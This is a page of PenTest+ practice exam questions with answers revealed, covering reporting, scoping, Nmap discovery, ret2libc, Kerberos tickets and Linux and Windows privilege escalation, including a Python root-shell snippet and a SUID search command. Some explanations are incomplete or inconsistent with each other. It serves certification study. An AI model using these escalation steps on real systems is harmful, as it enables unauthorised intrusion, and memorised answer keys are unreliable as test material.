Courseiva

CompTIA PenTest+ (PT0-003) (PT0-003) — Questions 601–675

777 questions total · 11pages · All types, answers revealed

Page 8

Page 9 of 11

Page 10
601
MCQeasy

Which section of a penetration testing report should provide a high-level overview of the test results using business language and strategic recommendations?

A.Executive summary
B.Technical findings section
C.Remediation recommendations
D.Appendices
AnswerA

The executive summary is the report section intended for senior management and other non-technical stakeholders. It translates the engagement's findings into business risk language, concisely summarizing the overall security posture and prioritizing strategic recommendations. This section deliberately avoids technical jargon and focuses on the high-level impact, making it the appropriate place for a macrolevel account of the assessment's key takeaways.

Why this answer

The executive summary is designed for non-technical stakeholders to understand the overall risk and key actions.

602
MCQmedium

A client requests a penetration test that includes testing of both internal network devices and a public-facing web application. The tester is provided with a VPN account for internal access but no credentials for the web application. Which type of penetration test is this?

A.White box
B.Red team
C.Grey box
D.Black box
AnswerC

Grey box testing grants the tester partial knowledge of the target, such as standard user credentials, VPN access, or basic network visibility, without exposing full architecture or privileged credentials. This directly matches the client's request, where VPN access gives a realistic internal foothold while still requiring the tester to discover vulnerabilities, escalate privileges, and move laterally, making grey box the correct answer.

Why this answer

Grey box testing involves partial knowledge; the tester has internal network access but not web app credentials.

603
MCQhard

During a penetration test, a tester finds a custom binary that is vulnerable to a stack-based buffer overflow. The binary has DEP enabled but no ASLR. Which of the following exploitation techniques would be MOST effective to achieve code execution?

A.Return-oriented programming (ROP) to bypass DEP
B.Heap spraying to inject shellcode
C.ret2libc to call system() with a controlled argument
D.Stack pivoting to redirect execution to a known location
AnswerC

ret2libc is the correct choice because it reuses existing executable code in libc, specifically the system() function, to execute commands like '/bin/sh', completely sidestepping DEP's non-executable stack and heap. With ASLR disabled, libc's base address is fixed, so the exact addresses of system() and the string '/bin/sh' (which can be placed in a writable area or found in libc's data section) are known in advance. The attacker crafts a stack overflow that overwrites the return address with system()'s address and arranges the stack such that the first argument points to the command string. This is far simpler than full ROP because only a single function call is required—no gadget chains necessary.

Why this answer

Ret2libc allows the tester to call the system() function from libc with a controlled argument (e.g., "/bin/sh") to spawn a shell, bypassing DEP (which prevents code execution on the stack) without needing to execute shellcode. Since ASLR is disabled, the address of system() and the string "/bin/sh" in libc are predictable, making this technique reliable and effective.

Exam trap

The trap here is that candidates may choose ROP (Option A) thinking it is always required to bypass DEP, but ret2libc is a simpler and more effective technique when ASLR is disabled, as it directly calls a libc function without needing to chain gadgets.

How to eliminate wrong answers

Option A is wrong because Return-oriented programming (ROP) is also a valid technique to bypass DEP, but it is more complex and unnecessary when ASLR is disabled; ret2libc is simpler and more direct for achieving code execution. Option B is wrong because heap spraying is used to bypass ASLR by filling the heap with NOP sleds and shellcode, but ASLR is already disabled, and DEP prevents execution of shellcode on the heap, making this ineffective. Option D is wrong because stack pivoting is a technique to redirect execution to a controlled memory region (e.g., the heap) when the stack is not directly controllable, but here the vulnerability is a stack-based buffer overflow where the stack is directly controllable, and DEP is bypassed via ret2libc, not by pivoting.

604
MCQhard

A tester needs to analyze a compiled .NET application. Which tool is most suitable?

A.Ghidra
B.x64dbg
C.IDA Pro
D.dnSpy
AnswerD

dnSpy decompiles and debugs .NET assemblies, reconstructing C# or IL from compiled binaries and allowing breakpoints during execution. That combination of decompilation and live debugging makes it suited to analysing a compiled .NET application, unlike tools aimed at native or Java bytecode.

Why this answer

dnSpy (option D) is the most suitable tool because it is a .NET decompiler and debugger that can open compiled .NET assemblies (managed IL) and reconstruct readable C#/VB.NET source, which is exactly what analyzing a .NET application requires. Ghidra (A) and IDA Pro (C) are primarily native-code disassemblers/decompilers aimed at machine code, so they are far less effective for managed .NET IL. x64dbg (B) is a native Windows debugger for x86/x64 binaries and does not natively decompile .NET assemblies. Therefore, dnSpy is the correct choice for this scenario.

Exam trap

Trick: Candidates may choose IDA Pro due to its popularity, but it is not the best for .NET.

605
MCQmedium

During reconnaissance, a penetration tester discovers a public GitHub repository belonging to the target organization. The repository contains internal project names, server IP addresses, and code comments with database credentials. Which reconnaissance technique does this represent?

A.OSINT (Open-Source Intelligence)
B.DNS enumeration
C.Port scanning
D.Social engineering
AnswerA

OSINT involves collecting information from publicly accessible sources, such as GitHub repositories, without directly interacting with the target's systems. Discovering a public code repository is a classic OSINT activity; it may expose hardcoded credentials, internal infrastructure details, or proprietary code. This passive approach reduces detection risk and is often an early phase in penetration testing.

Why this answer

The discovery of a public GitHub repository containing internal project names, server IP addresses, and database credentials is a classic example of OSINT (Open-Source Intelligence). OSINT involves collecting and analyzing publicly available information from sources like code repositories, social media, and websites to gain insights about a target without direct interaction. This technique leverages the fact that sensitive data is often inadvertently exposed in public repositories, making it a passive reconnaissance method.

Exam trap

The trap here is that candidates may confuse OSINT with active reconnaissance techniques like DNS enumeration or port scanning, failing to recognize that passive collection from public sources (like GitHub) is a distinct OSINT method.

How to eliminate wrong answers

Option B (DNS enumeration) is wrong because it specifically involves querying DNS servers to discover hostnames, IP addresses, and DNS records (e.g., A, MX, CNAME) using tools like `dnsrecon` or `nslookup`, not by analyzing code repositories. Option C (Port scanning) is wrong because it actively probes target systems for open TCP/UDP ports and services using tools like `nmap`, which requires network connectivity and is an active reconnaissance technique, not passive information gathering from public sources. Option D (Social engineering) is wrong because it relies on manipulating human behavior through phishing, pretexting, or impersonation to extract information, whereas this scenario involves finding already exposed data in a public repository without any human interaction.

606
MCQmedium

After gaining initial access to an internal network, a penetration tester wants to identify live hosts on a subnet without generating excessive traffic. Which Nmap command would be most appropriate for host discovery using ICMP echo requests and TCP SYN to port 80?

A.nmap -A 192.168.1.0/24
B.nmap -sS 192.168.1.0/24
C.nmap -O 192.168.1.0/24
D.nmap -sn 192.168.1.0/24
AnswerD

-sn, historically called -sP or "ping sweep," disables port scanning completely and tells Nmap to perform only host discovery, reporting every IP address that is currently reachable on the target subnet. On a local Ethernet network, Nmap uses ARP requests for discovery because they are highly reliable and cannot be filtered without breaking normal IP communications; for remote targets, it combines ICMP echo requests, TCP SYN probes to ports 80 and 443, and ICMP timestamp requests to determine liveness. This yields a fast, low-noise inventory of live systems, which is exactly the right first step when mapping an internal network after gaining initial access, before deciding which IPs warrant deeper port scanning.

Why this answer

Nmap's -sn flag performs a ping sweep, which by default uses ICMP echo, TCP SYN to port 80, and other probes. The other options are for port scanning or OS detection.

607
MCQeasy

A penetration tester wants to perform a network scan that minimizes the chance of detection by an intrusion detection system (IDS). Which Nmap timing template is MOST appropriate?

A.-T0
B.-T3
C.-T5
D.-T2
AnswerA

The -T0 (paranoid) timing template is the slowest Nmap profile, inserting very large delays between consecutive probes and setting `max-scan-delay` to five minutes. It deliberately operates well below rate-based IDS thresholds to avoid detection, making it the most appropriate choice when stealth is the priority. However, this thorough avoidance comes at the cost of dramatically increased scan duration.

Why this answer

The -T0 (Paranoid) timing template is the most appropriate for minimizing detection by an IDS because it introduces extreme delays between packet transmissions (up to 5 minutes between probes) and uses a very slow scan rate. This makes the scan traffic blend into normal network noise, reducing the likelihood of triggering signature-based or anomaly-based IDS alerts that rely on detecting rapid, sequential connection attempts.

Exam trap

The trap here is that candidates often choose -T2 (Polite) thinking it is slow enough to evade detection, but they fail to recognize that -T0 is the only template specifically designed for IDS evasion with delays measured in minutes, not seconds.

How to eliminate wrong answers

Option B (-T3) is wrong because it is the default Nmap timing template, which balances speed and reliability but sends packets at a rate that is easily detectable by most IDS/IPS systems. Option C (-T5) is wrong because it is the Insane template, which uses the fastest timing (minimum delays, aggressive parallelism) and is almost guaranteed to trigger IDS alerts due to its high packet rate and obvious scan patterns. Option D (-T2) is wrong because it is the Polite template, which slows down scans to avoid overwhelming networks but still sends packets at intervals (typically 0.4 seconds) that are too aggressive for stealthy scanning and can be detected by modern IDS solutions.

608
MCQhard

During a red team engagement, a penetration tester needs to pivot from a compromised internal web server to a database server that is not directly accessible. The web server has two network interfaces: 10.0.1.5 and 192.168.1.5. The database server is at 192.168.1.10. Which technique should the tester use to reach the database?

A.ARP spoofing
B.DNS tunneling
C.Port knocking
D.Pivoting through the web server
AnswerD

Pivoting through the web server is correct because the web server is a dual-homed or multi-connected host that already has routable access to the database subnet. By compromising the web server, the tester can use it as a relay—for example, with SSH dynamic port forwarding, Metasploit's pivot module, or a SOCKS proxy—to send packets to the database server. This effectively extends the attacker's reach into an otherwise inaccessible network segment.

Why this answer

D is correct because the web server has two network interfaces (10.0.1.5 and 192.168.1.5), making it a dual-homed host that can act as a pivot point. The tester can use the compromised web server as a proxy or relay to route traffic from the attacker's machine (reachable via 10.0.1.5) to the database server at 192.168.1.10, which is on a separate subnet not directly accessible. This technique, known as pivoting, typically involves tools like SSH port forwarding, Metasploit's route add, or a SOCKS proxy to forward traffic through the compromised host.

Exam trap

The trap here is that candidates confuse pivoting with other network manipulation techniques like ARP spoofing or port knocking, failing to recognize that the dual-homed web server provides a routing path between subnets, which is the core requirement for pivoting.

How to eliminate wrong answers

Option A is wrong because ARP spoofing operates at Layer 2 within the same broadcast domain to intercept traffic between hosts, but it cannot bridge traffic across different subnets (10.0.1.0/24 and 192.168.1.0/24) or provide access to a host that is not directly reachable from the attacker. Option B is wrong because DNS tunneling encapsulates non-DNS traffic within DNS queries and responses, which is used for exfiltration or command-and-control, not for routing traffic through a dual-homed host to reach an internal database server. Option C is wrong because port knocking is an authentication method that opens a firewall port after a sequence of connection attempts, but it does not enable routing or forwarding of traffic from one subnet to another through a compromised host.

609
MCQhard

A penetration tester has gained low-privilege shell access on a Linux server. The tester runs `sudo -l` and sees the following entry: `(root) NOPASSWD: /usr/bin/python3 /opt/scripts/*.py` The `/opt/scripts/` directory is owned by the tester's current user. Which technique is most effective for escalating privileges to root?

A.Create a symbolic link from a Python script to a system file like /etc/shadow
B.Write a malicious Python script to /opt/scripts/ that spawns a root shell
C.Exploit a kernel vulnerability to overwrite the sudo binary
D.Overwrite an existing Python script in /usr/bin/ with a malicious payload
AnswerB

Since the user owns /opt/scripts, they can create a Python script that imports os and calls os.system('/bin/bash') or launches a reverse shell with socket and subprocess modules. When the script is run via the configured sudo rule, it executes with root privileges because sudo preserves the target user's (root) permissions. This is a classic and reliable privilege escalation when a sudoers entry permits executing scripts from a user-writable directory without disabling the associated commands.

Why this answer

The tester's user owns `/opt/scripts/` and can write arbitrary files there. The sudo rule allows executing any `.py` file in that directory as root without a password. By writing a Python script that calls `os.setuid(0); os.system('/bin/bash')` or similar, the tester can spawn a root shell, directly leveraging the misconfigured sudoers entry.

Exam trap

The trap here is that candidates may think symbolic links or overwriting system files are viable, but the key is that the sudo rule specifically executes Python scripts from a writable directory, making a crafted script the simplest and most direct escalation path.

How to eliminate wrong answers

Option A is wrong because creating a symbolic link from a Python script to `/etc/shadow` would not execute as root; `sudo` runs the Python interpreter on the linked file, but `/etc/shadow` is not a valid Python script and would cause an error, not privilege escalation. Option C is wrong because exploiting a kernel vulnerability is unnecessary and less reliable; the sudo misconfiguration provides a direct, low-risk path to root without kernel exploits. Option D is wrong because the sudo rule only applies to `/opt/scripts/*.py`, not to `/usr/bin/`; overwriting a script there would not be executed with root privileges via this sudo entry.

610
Multi-Selectmedium

In a red team exercise, the team wants to simulate a realistic adversary. Which TWO of the following are typically included in the scope of a red team engagement compared to a standard penetration test?

Select 2 answers
A.Extensive vulnerability scanning of all in-scope systems
B.Comprehensive compliance verification against standards
C.Physical security testing (e.g., tailgating, lock picking)
D.Detailed reporting of all vulnerabilities found
E.Social engineering attacks against employees
AnswersC, E

Physical security testing is a legitimate and often essential component of a red team engagement because real-world adversaries frequently exploit physical access as an initial foothold or alternate path into network resources. Techniques like tailgating into a secured office, picking locks to access server rooms, or cloning employee badges allow the red team to simulate a full-scope attacker who does not simply rely on remote network access. By physically penetrating a facility, the team can demonstrate how seemingly separate physical and logical security controls can be chained into a critical business impact.

Why this answer

Red team exercises often include physical and social engineering attacks, and may attempt to remain undetected for longer periods.

611
MCQhard

During a penetration test, the tester discovers evidence of an ongoing ransomware attack on the client's network. Which of the following is the most appropriate action?

A.Continue the test as planned and include the finding in the final report.
B.Notify the client immediately and recommend contacting law enforcement.
C.Disconnect from the network and destroy all evidence.
D.Try to stop the ransomware attack using penetration testing tools.
AnswerB

Immediate notification is the only correct action because ransomware is an active criminal incident that requires instantaneous incident response, not a passive test finding. As a penetration tester, you have no authority to remediate or direct law enforcement, but you do have a contractual and ethical obligation to alert the client's designated contacts so they can initiate containment and recovery. Recommending law enforcement is appropriate because ransomware is a crime, and involving police ensures proper evidence preservation, legal handling, and potential attribution. This action aligns with industry standards such as those from PTES and NIST, which dictate that suspected criminal activity discovered during a test must be reported immediately to the client.

Why this answer

Evidence of criminal activity must be reported immediately to the client and may require law enforcement involvement.

612
MCQmedium

A tester has gained a low-privilege shell on a Windows machine and found that the user has the SeImpersonatePrivilege enabled. Which attack can be used to escalate privileges to SYSTEM?

A.DLL hijacking
B.Kerberoasting
C.Token impersonation using PrintSpoofer
D.AlwaysInstallElevated
AnswerC

Token impersonation using PrintSpoofer is a powerful privilege escalation technique that exploits the Print Spooler service's named pipe to manipulate an impersonation token and execute commands with SYSTEM privileges. The tool leverages the SeImpersonatePrivilege, which is typically granted to service accounts (e.g., IIS, MSSQL) but is not normally enabled for standard low-privilege users; however, when the current process holds this privilege, PrintSpoofer can request a token from the Spooler that represents the SYSTEM account and then impersonate it. This method does not require write access to system directories, domain credentials, or specific Group Policy settings, making it a direct and reliable path to SYSTEM escalation in this scenario, hence the correct answer.

Why this answer

SeImpersonatePrivilege allows impersonating a client after authentication; tools like PrintSpoofer, RoguePotato exploit this to gain SYSTEM.

613
MCQmedium

A penetration tester is conducting a wireless assessment and has captured a WPA2 handshake. The tester wants to crack the pre-shared key (PSK) offline. Which of the following tools is specifically designed to perform this task?

A.Reaver
B.Wifite
C.Aircrack-ng
D.Kismet
AnswerC

Aircrack-ng is a suite of tools for wireless network auditing, and its aircrack-ng component is specifically designed to crack WEP and WPA/WPA2 PSK keys from captured handshakes. It uses a wordlist or brute-force to compute the pairwise master key (PMK) and verify it against the captured handshake. This makes it the correct tool for offline WPA2 PSK cracking in this scenario.

Why this answer

Aircrack-ng is the standard tool for offline cracking of WPA/WPA2 PSK handshakes. It takes a capture file containing the four-way handshake and a wordlist, computes the PMK for each candidate password, and compares it to the captured handshake to find the correct PSK. Kismet is for detection, Wifite is an automation wrapper, and Reaver targets WPS, so aircrack-ng is the correct choice.

Exam trap

The trap here is confusing wireless capture or automation tools with the actual cracking engine, or mixing up WPS attacks with PSK handshake cracking.

614
MCQeasy

During a penetration test, you run the following command on a Linux target: `find / -type f -perm /4000 2>/dev/null`. What are you attempting to identify?

A.World-writable files
B.SUID binaries
C.Files with extended attributes
D.SGID binaries
AnswerB

This is the correct answer because `-perm /4000` instructs `find` to locate any file where the set-user-ID (SUID) permission bit is set, regardless of other permission bits. In octal, 4000 corresponds specifically to the SUID bit, and the leading `/` means 'any of these bits' (here just 4000). When a binary has SUID set, it executes with the file owner's privileges, which makes SUID binaries a high-priority target for privilege escalation during a penetration test.

Why this answer

The find command with -perm /4000 searches for files with SUID bit set, which can be exploited for privilege escalation.

615
MCQeasy

A penetration tester is preparing the final report. The client's CEO wants a high-level overview of the test results, including the overall security posture and business risk, without technical details. Which section of the report should the tester emphasize for the CEO?

A.Technical findings and recommendations
B.Executive summary
C.Methodology
D.Appendices
AnswerB

The executive summary is a concise, non-technical overview placed at the beginning of a penetration test report, specifically addressed to senior leadership. It states the overall risk level, highlights the most important business impacts, and gives high-level recommendations without exposing vulnerability details. This section allows executives to quickly grasp the security posture and decide on resource allocation or prioritization. It is the section most appropriate for a CEO audience.

Why this answer

The executive summary is the section of a penetration testing report that provides a high-level overview of the test results, focusing on the overall security posture and business risk without technical details. It is specifically designed for non-technical stakeholders like the CEO, who need to understand the impact on the organization without delving into specific vulnerabilities or exploitation steps.

Exam trap

The trap here is that candidates often confuse the executive summary with the technical findings section, mistakenly believing the CEO needs detailed vulnerability data to understand risk, when in fact the executive summary is the only section tailored for non-technical decision-makers.

How to eliminate wrong answers

Option A is wrong because technical findings and recommendations contain detailed vulnerability descriptions, exploit steps, and remediation commands (e.g., specific CVEs, patch versions, or configuration changes) that are too granular for a CEO's high-level needs. Option C is wrong because the methodology section describes the testing approach, tools used (e.g., Nmap, Metasploit), and scope limitations, which are operational details irrelevant to a business risk overview. Option D is wrong because appendices include raw data such as scan outputs, log excerpts, and evidence files (e.g., PCAPs or screenshots), which are too technical and voluminous for an executive audience.

616
MCQeasy

A penetration tester is preparing a report for a client who has both a technical security team and a non-technical executive team. The tester wants to ensure that each audience receives the appropriate level of detail. Which of the following is the most effective approach?

A.Provide the same comprehensive report to both audiences, assuming the security team will interpret it for executives.
B.Create a single report that includes an executive summary at the beginning and a detailed technical section later.
C.Write two separate reports: one for executives with only business impact and another for technical staff with all details.
D.Present only the executive summary and invite the technical team to ask questions orally.
AnswerB

This is the correct structure because it aligns with standard penetration testing report formats (e.g., PTES, NIST SP 800-115) that use a layered approach. An executive summary at the front provides a concise, non-technical overview of the highest-risk findings, business impact, and strategic recommendations, allowing executives to make informed decisions without reading every command or log. The detailed technical section later includes reproducible vulnerabilities, affected assets, proof-of-concept evidence, CVSS scores, and specific remediation steps, giving the technical staff the exact data they need to verify and fix the issues while preserving a single authoritative document that ties business context to technical reality.

Why this answer

It provides a single report with an executive summary for non-technical stakeholders and a detailed technical section for the security team, satisfying both audiences' needs without duplication or omission. This approach aligns with industry best practices for penetration testing reporting, as outlined in standards like PTES and NIST SP 800-115, ensuring clear communication of risks and technical findings.

Exam trap

The trap here is that candidates may choose Option C, thinking two separate reports are more precise, but the exam emphasizes efficiency and consistency, where a single report with both sections avoids redundancy and ensures all stakeholders share the same foundational information.

How to eliminate wrong answers

Option A is wrong because it assumes the technical team will interpret the report for executives, which risks miscommunication or omission of critical business impacts, and fails to provide a tailored summary for non-technical readers. Option C is wrong because creating two separate reports can lead to inconsistencies, duplication of effort, and potential loss of context between business impact and technical details, which may confuse decision-making. Option D is wrong because it omits a written technical report, leaving the technical team without documented evidence for remediation, and relies on oral communication that can be forgotten or misinterpreted.

617
Multi-Selecthard

A penetration tester discovers evidence of an ongoing criminal activity (e.g., data exfiltration by an insider) during a test. According to best practices and legal considerations, which THREE actions should the tester take?

Select 3 answers
A.Preserve all evidence and document findings for law enforcement
B.Publicly disclose the finding on a vulnerability disclosure platform
C.Immediately stop all testing activities
D.Contact the client's emergency contact per the communication plan
E.Continue testing to gather more evidence
AnswersA, C, D

Preserving evidence is a forensic priority; you must create a chain of custody by recording exactly what was observed, when, and from which system, and avoid altering or deleting any data. Use write-blockers or forensic imaging if feasible, and document all findings with timestamps and system details so law enforcement can use the evidence in a legal proceeding. This action is correct because it directly supports the investigation without overstepping your engagement scope.

Why this answer

When discovering criminal activity, the tester should stop testing, notify the client contact, and preserve evidence for investigation.

618
MCQeasy

After completing a penetration test, the client's technical team requests a detailed list of all vulnerabilities found, prioritized by severity, along with step-by-step reproduction steps and remediation guidance. In which section of the standard penetration testing report should this information be provided?

A.Executive Summary
B.Methodology
C.Findings
D.Appendices
AnswerC

The Findings section is the definitive technical record of every discovered vulnerability, listing each issue with its severity rating, affected asset, detailed reproduction steps, proof of concept, and recommended remediation actions. It is structured to give the client's technical team everything they need to re-create the issue, validate the risk, and implement fixes in a prioritized manner. Unlike the executive summary, it is written for practitioners, assuming a deep technical understanding, and it is the primary section referenced during the remediation phase.

Why this answer

The Findings section of a standard penetration testing report is the correct location for a detailed, prioritized list of vulnerabilities with step-by-step reproduction steps and remediation guidance. This section provides the technical depth required by the client's technical team, contrasting with the high-level summaries found elsewhere.

Exam trap

The trap here is that candidates confuse the Executive Summary's high-level risk overview with the detailed technical breakdown required by the client's technical team, leading them to choose Option A instead of the Findings section.

How to eliminate wrong answers

Option A is wrong because the Executive Summary is a high-level overview for non-technical stakeholders, not a detailed technical list with reproduction steps. Option B is wrong because the Methodology section describes the tools, techniques, and scope of the test, not the specific vulnerabilities found. Option D is wrong because Appendices contain supplementary material like raw logs or configuration files, not the primary vulnerability details and remediation steps.

619
MCQmedium

You are conducting a penetration test for a financial institution. The rules of engagement specify that you are not to access any production customer data. During the test, you discover a SQL injection vulnerability in a public-facing web application that allows you to extract customer personally identifiable information (PII). You successfully demonstrate the injection but do not extract any actual PII. According to ethical guidelines and the rules of engagement, what is the appropriate course of action?

A.Extract a small sample of PII to prove impact, then report the vulnerability.
B.Continue the test but avoid exploiting the SQL injection further to stay within scope.
C.Document the vulnerability and include it in the final report without further action.
D.Immediately stop the test and notify the client with details of the finding.
AnswerD

Stopping the test and immediately notifying the client is the correct ethical and professional response to a critical finding. It prevents further exploitation that could cause unintended damage and enables the client to activate incident response procedures without delay. When notifying, the tester should provide precise technical details—the vulnerable parameter, the payload used, and evidence of impact (using non-sensitive data)—so the client can promptly verify, remediate, and protect their systems.

Why this answer

Option D is correct because the rules of engagement explicitly prohibit accessing production customer data, so upon discovering a SQL injection that could expose PII, the tester must halt testing and immediately notify the client to prevent any accidental or unauthorized data exposure. This aligns with ethical penetration testing principles, which require respecting scope constraints and reporting critical findings promptly rather than continuing to exploit them. Option A is wrong because extracting even a small sample of PII would violate the explicit prohibition on accessing production customer data.

Option B is insufficient because merely avoiding further exploitation does not address the obligation to report a serious vulnerability that could compromise customer data. Option C is also inadequate because documenting the finding without notifying the client immediately delays critical risk communication and fails to follow the rules of engagement's implied duty to stop upon encountering such a boundary.

620
MCQhard

A penetration tester has obtained the NTLM hash of a service account during an internal test. The tester wants to gain access to a specific SQL server that uses Kerberos authentication. The tester does not know the plaintext password. Which attack is MOST appropriate to forge a service ticket for the SQL server?

A.Silver Ticket attack
B.Golden Ticket attack
C.Pass-the-hash attack
D.SMB relay attack
AnswerA

A Silver Ticket attack forges a Kerberos TGS (Ticket-Granting Service) ticket using the NTLM hash of the target service account. The attacker crafts a TGS for the service's SPN, signs it with the service account's secret, and can impersonate any user to that service without needing the domain's KRBTGT hash. Because the forged TGS is encrypted with the service account's key, the service accepts it as legitimate, granting the attacker persistent, service-specific access.

Why this answer

A Silver Ticket attack is the most appropriate because it forges a service ticket (TGS) for a specific service, such as the SQL server, using the NTLM hash of the service account. Since the tester has the NTLM hash but not the plaintext password, they can craft a valid Kerberos service ticket without needing to authenticate to the domain controller, directly granting access to the SQL server.

Exam trap

The trap here is that candidates often confuse Silver Ticket attacks (forging service tickets) with Golden Ticket attacks (forging TGTs), but the key distinction is that a Silver Ticket targets a specific service using the service account's hash, while a Golden Ticket grants domain-wide access using the KRBTGT hash.

How to eliminate wrong answers

Option B (Golden Ticket attack) is wrong because it forges a Kerberos Ticket Granting Ticket (TGT) using the KRBTGT account hash, which grants domain-wide access, not a targeted service ticket for a specific SQL server. Option C (Pass-the-hash attack) is wrong because it reuses an NTLM hash to authenticate over NTLM, but the SQL server uses Kerberos authentication, which requires a Kerberos ticket, not an NTLM hash directly. Option D (SMB relay attack) is wrong because it relays captured NTLM authentication to another service, but the goal is to forge a Kerberos service ticket, not relay NTLM challenges.

621
MCQhard

A penetration tester is performing internal reconnaissance on a Windows Active Directory environment. The tester has a low-privileged domain user account. Which of the following techniques is most likely to help identify all domain controllers and their IP addresses without generating excessive network traffic or alerts?

A.Perform a full subnet ping sweep using Nmap
B.Query the DNS service for SRV records of _ldap._tcp.dc._msdcs.domain.local
C.Use NetBIOS name resolution by sending broadcasts
D.Enumerate SMB shares on all IP addresses in the subnet
AnswerB

Querying DNS for the SRV record _ldap._tcp.dc._msdcs.domain.local is the correct, low-noise method because it leverages a standard LDAP service locator record that every domain controller registers with the DNS server. This is a routine client-to-DNS lookup that domain-joined machines perform constantly, so security monitoring tools typically do not treat it as suspicious. The query returns the hostnames and port numbers of all available domain controllers in the domain, giving the tester a direct, accurate list without generating scan traffic or touching the target systems themselves. It is effectively passive enumeration that blends in with normal network operations.

Why this answer

Querying DNS for SRV records of _ldap._tcp.dc._msdcs.domain.local is a standard, low-noise method to discover all domain controllers in an Active Directory environment. This query leverages the automatic registration of LDAP service records by domain controllers, requiring only a single DNS lookup rather than sweeping the network, thus avoiding excessive traffic and typical security alerts.

Exam trap

The trap here is that candidates often default to active scanning techniques like Nmap ping sweeps (Option A) because they are familiar, overlooking that DNS SRV record queries are a passive, targeted, and far more efficient method for discovering domain controllers in an Active Directory environment.

How to eliminate wrong answers

Option A is wrong because a full subnet ping sweep using Nmap generates significant network traffic and is easily detected by intrusion detection systems (IDS) or endpoint protection, which is contrary to the requirement of avoiding excessive traffic or alerts. Option C is wrong because NetBIOS name resolution via broadcasts is limited to the local subnet, does not reliably discover all domain controllers across multiple subnets, and broadcasts can be noisy and logged. Option D is wrong because enumerating SMB shares on all IP addresses in the subnet is a high-traffic, noisy technique that probes each host individually, likely triggering alerts, and does not directly identify domain controllers.

622
MCQmedium

A client wants to test a web application that uses a third-party payment gateway. The client explicitly wants the payment gateway to be excluded from the test to avoid service disruption. Where should this exclusion be formally documented?

A.Non-Disclosure Agreement (NDA)
B.Statement of Work (SOW)
C.Rules of Engagement (ROE)
D.Penetration Test Plan
AnswerC

The Rules of Engagement document defines the agreed scope, boundaries and constraints of an engagement, so naming the third-party payment gateway as out-of-scope here formally satisfies the client's requirement to exclude it and avoid service disruption.

Why this answer

The Rules of Engagement (ROE) document is the correct place to formally exclude the third-party payment gateway from testing. The ROE defines the scope, boundaries, and constraints of the penetration test, including specific systems or services that must not be targeted. This ensures the client's requirement to avoid service disruption to the payment gateway is legally and operationally enforced.

Exam trap

The trap here is that candidates often confuse the Penetration Test Plan (which details how to test) with the Rules of Engagement (which defines what is allowed and forbidden), leading them to incorrectly select the Plan instead of the ROE for scope exclusions.

How to eliminate wrong answers

Option A is wrong because a Non-Disclosure Agreement (NDA) is a legal contract for confidentiality, not for defining test scope or exclusions. Option B is wrong because the Statement of Work (SOW) describes the high-level objectives, deliverables, and timeline, but it does not contain the granular operational constraints like system exclusions. Option D is wrong because the Penetration Test Plan details the technical methodology and procedures, but the formal authorization to exclude specific targets belongs in the ROE, which is the authoritative document for rules and boundaries.

623
Multi-Selectmedium

A penetration tester is performing reconnaissance on a target network and wants to identify all live hosts without sending many packets. Which TWO techniques are MOST effective for host discovery in a local subnet? (Select TWO.)

Select 2 answers
A.ARP scan using arp-scan
B.TCP SYN scan on port 80
C.UDP scan on port 161
D.ICMP ping sweep using nmap -sn
E.DNS zone transfer
AnswersA, D

ARP scanning with arp-scan is a Layer 2 host discovery technique that broadcasts ARP requests to an IP range and identifies live hosts by their ARP replies, which include MAC addresses. It is highly effective on the local subnet because ARP is a required protocol for IP communication and cannot be blocked by host-based firewalls, making it a reliable and stealthy way to map live systems without generating TCP or UDP traffic.

Why this answer

Option A (ARP scan using arp-scan) is correct because ARP is a Layer 2 protocol that operates within the local subnet broadcast domain, and arp-scan sends a single ARP request per target IP; any live host must reply with its MAC address, making it fast, reliable, and impossible to block without breaking normal network communication. Option D (ICMP ping sweep using nmap -sn) is correct because nmap -sn performs host discovery by sending ICMP echo requests (plus TCP SYN to 443 and TCP ACK to 80 by default when run as root) and requires only one or a few packets per host, efficiently identifying live systems across a subnet. Option B (TCP SYN scan on port 80) is not a dedicated host-discovery technique; it probes only a single port and will miss hosts that are alive but not listening on port 80, while also generating more packets per host than a ping sweep.

Option C (UDP scan on port 161) targets SNMP and is unreliable for host discovery since closed UDP ports may not respond and many hosts do not run SNMP, producing false negatives. Option E (DNS zone transfer) is an information-gathering technique for enumerating DNS records, not a method for identifying live hosts on a local subnet.

Exam trap

The trap here is that candidates often overlook ARP scans because they think only ICMP or TCP techniques are valid for host discovery, but on a local subnet ARP is the most efficient and stealthy method, while ICMP ping sweeps are also correct but can be blocked by host firewalls.

624
MCQeasy

A penetration tester is performing passive reconnaissance on a target organization. Which of the following tools is best suited for gathering information from public sources such as search engines, social media, and website scraping?

A.theHarvester
B.Metasploit
C.Nessus
D.Nmap
AnswerA

theHarvester is an OSINT tool that passively collects email addresses, subdomains, hostnames, and employee names from public sources such as Google, Bing, LinkedIn, and PGP key servers. It operates without sending any packets directly to the organization's own infrastructure, so it is undetectable and strictly non-intrusive. While it can optionally perform DNS brute forcing when run in active mode, its standard use aligns with passive reconnaissance efforts during the planning phase.

Why this answer

theHarvester is an OSINT tool designed to gather emails, subdomains, IPs, and URLs from public sources like search engines and social media.

625
MCQeasy

A penetration tester needs to enumerate Active Directory users and groups from a Windows domain. Which PowerShell tool is specifically designed for AD enumeration and is commonly used in post-exploitation?

A.Invoke-Mimikatz
B.Nmap
C.CrackMapExec
D.PowerView
AnswerD

PowerView is a PowerShell post-exploitation framework that wraps directory services queries, enumerating users, groups, computers and trusts with minimal native tooling. It satisfies the AD enumeration requirement through functions such as Get-NetUser and Get-NetGroup, commonly loaded reflectively during engagements.

Why this answer

PowerView (option D) is a PowerShell tool specifically designed for Active Directory enumeration, providing functions to query users, groups, computers, and permissions via LDAP. It is widely used in post-exploitation because it runs in-memory, avoids writing to disk, and integrates seamlessly with PowerShell's pipeline for stealthy reconnaissance.

Exam trap

The trap here is that candidates confuse post-exploitation credential tools (like Invoke-Mimikatz) with enumeration tools, or assume general-purpose scanners (Nmap) or multi-function frameworks (CrackMapExec) are PowerShell-native AD enumeration tools, when PowerView is the correct specialized PowerShell module for this task.

How to eliminate wrong answers

Option A is wrong because Invoke-Mimikatz is a tool for credential dumping (e.g., extracting plaintext passwords, hashes, and Kerberos tickets), not for enumerating AD users and groups. Option B is wrong because Nmap is a network scanning tool that discovers hosts and services via raw packets, not a PowerShell-based AD enumeration tool. Option C is wrong because CrackMapExec is a post-exploitation tool that automates credential spraying, SMB enumeration, and lateral movement, but it is not a PowerShell tool specifically designed for AD user/group enumeration; PowerView fills that niche.

626
MCQhard

